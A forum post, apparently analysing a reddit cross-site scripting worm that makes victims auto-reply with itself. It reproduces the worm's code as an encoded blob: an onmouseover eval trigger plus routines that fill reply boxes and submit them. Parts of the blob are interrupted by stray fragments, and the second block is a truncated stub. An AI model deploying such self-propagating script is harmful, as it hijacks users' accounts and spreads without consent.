They seem to have converted some JavaScript code into HTML-escaped characters and got the browser to interpret it somehow. When I open my received messages, it instantly tries to post a reply to every message on that page, thus spreading itself.

Edit – there was a submission to programming earlier today (I think) that I can no longer find that had a similar, if much less sophisticated, attack. That one relied on people being stupid enough to copy and paste the code into the browser address bar. I suppose someone found an exploit and used his idea.

Decoding the script, which is URL encoded, gives us this:

[[code]]czo1Mjg6XCJbeF1bYl0NCltiXTovWw0Kej1cXFwiW3hdW2JdXFxcXG5bYl06L1tcXFwiK3RoaXMuaW5uZXJIVE1MK1xcXCJdKC9vbm1vdXNlb3ZlcntbJiomXX09ZXZhbCh1bmVzY2FwZSggICAgdGhpcy5pbm5lckhUTUwpKS8vKVxcXCI7DQpvPWRvY3VtZW50O2U9by5nZXRFbGVtZW50c0J5VGFnTmF7WyYqJl19bWUoXFxcJ2FcXFwnKTsNCmZvcihpPTA7aSZsdDtlLmxlbmd0aDtpKyspaWYgKGVbaV0uaW5uZXJIVE1MPT1cXFwncmVwbHlcXFwnKSQoZVtpXSkue1smKiZdfWNsaWNrKCk7DQpvPWRvY3VtZW50O2U9by5nZXRFbGVtZW50c0J5VGFnTmFtZShcXFwndGV4dGFyZWFcXFwnKTsNCmZvcihpPTA7aSZsdDtle1smKiZdfS5sZW5ndGg7aSsrKWVbaV0udmFsdWU9ejsNCmU9by5nZXRFbGVtZW50c0J5VGFnTmFtZShcXFwnYnV0dG9uXFxcJyk7DQpmb3IoaT0wO2kme1smKiZdfWx0O2UubGVuZ3RoO2krKykNCmlmIChlW2ldLmlubmVySFRNTD09XFxcJ3NhdmVcXFwnJmFtcDsmYW1wO2VbaV0uc3R5bGUuZGlzcGxheSE9e1smKiZdfVxcXCdub25lXFxcJykNCiQoZVtpXSkuY2xpY2soKTsNCl0oL29ubW91c2VvdmVyPWV2YWwodW5lc2NhcGUodGhpcy5pbm5lckhUTUwpKS8ve1smKiZdfSkNClwiO3tbJiomXX0=[[/code]]

Un-encoded it looks like:

[[code]]czo4OlwiW3hdW2JdDQpcIjt7WyYqJl19[[/code]]

Seems like the comment spam detector is removing the vast majority of it. Don’t be surprised if reddit goes down from this though.